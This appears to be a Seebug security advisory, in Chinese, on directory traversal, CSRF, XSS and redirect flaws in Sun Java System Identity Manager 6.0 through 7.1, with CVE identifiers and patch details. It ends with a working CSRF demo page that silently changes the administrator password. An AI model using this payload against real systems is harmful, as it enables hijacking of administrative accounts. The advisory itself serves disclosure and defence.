Sun Java System Identity Manager目录遍历及跨站请求伪造漏洞

2008-11-2100:00:00

Root

www.seebug.org

0.014 Low

EPSS

Percentile

86.5%

JSON

BUGTRAQ ID: 32262
CVE(CAN) ID: CVE-2008-5117,CVE-2008-5118,CVE-2008-5116,CVE-2008-5115,CVE-2008-5114

Sun Java System Identity Manager是一个完整的端到端的保护敏感数据和管理标识配置文件与许可的解决方案。

Identity Manager的/idm/includes/helpServer.jsp服务器端脚本没有正确地验证ext参数，未经认证的远程攻击者可以通过向服务器提交恶意请求执行目录遍历攻击，检索文件系统上任意已知位置上的文件。

Identity Manager的update password功能（/idm/admin/changeself.jsp）中存在跨站请求伪造漏洞。由于没有使用不可预测的值来分解update password请求，也没有对管理用户要求输入之前的口令，因此如果管理用户在认证到Identity Manager期间如果受骗访问了恶意的HTML页面的话就可能导致劫持管理帐号。

此外跨站脚本漏洞可能在用户点击到Identity Manager的链接时允许本地或远程非特权用户在用户浏览器中执行非授权的脚本代码；两个额外漏洞可能允许本地或远程非特权用户将浏览器重新定向到非预期的远程站点或注入包含有非预期站点数据的帧。
0
Sun Java System Identity Manager 7.1
Sun Java System Identity Manager 7.0
Sun Java System Identity Manager 6.0 SP4
Sun Java System Identity Manager 6.0 SP3
Sun Java System Identity Manager 6.0 SP2
Sun Java System Identity Manager 6.0 SP1
Sun Java System Identity Manager 6.0
Sun

Sun已经为此发布了一个安全公告（Sun-Alert-243386）以及相应补丁:
Sun-Alert-243386：Multiple Security Vulnerabilities in Sun Java System Identity Manager
http://sunsolve.sun.com/search/printfriendly.do?assetkey=1-66-243386-1


                                                &lt;html&gt;
&lt;h1&gt;CSRF attack demo - changes administrative password to 'Password19'&lt;/h1&gt;
&lt;script&gt;
    var img = new Image();
    img.src =
'https://target.tld/idm/admin/changeself.jsp?id=&amp;command=Save&amp;activeControl=&amp;resourceAccounts.password=Password19&amp;resourceAccounts.confirmPassword=Password19&amp;resourceAccounts.currentResourceAccounts%5BLighthouse%5D.selected=true';

&lt;/script&gt;
&lt;/html&gt;

0.014 Low

EPSS

Percentile

86.5%

JSON

Related for SSV:4478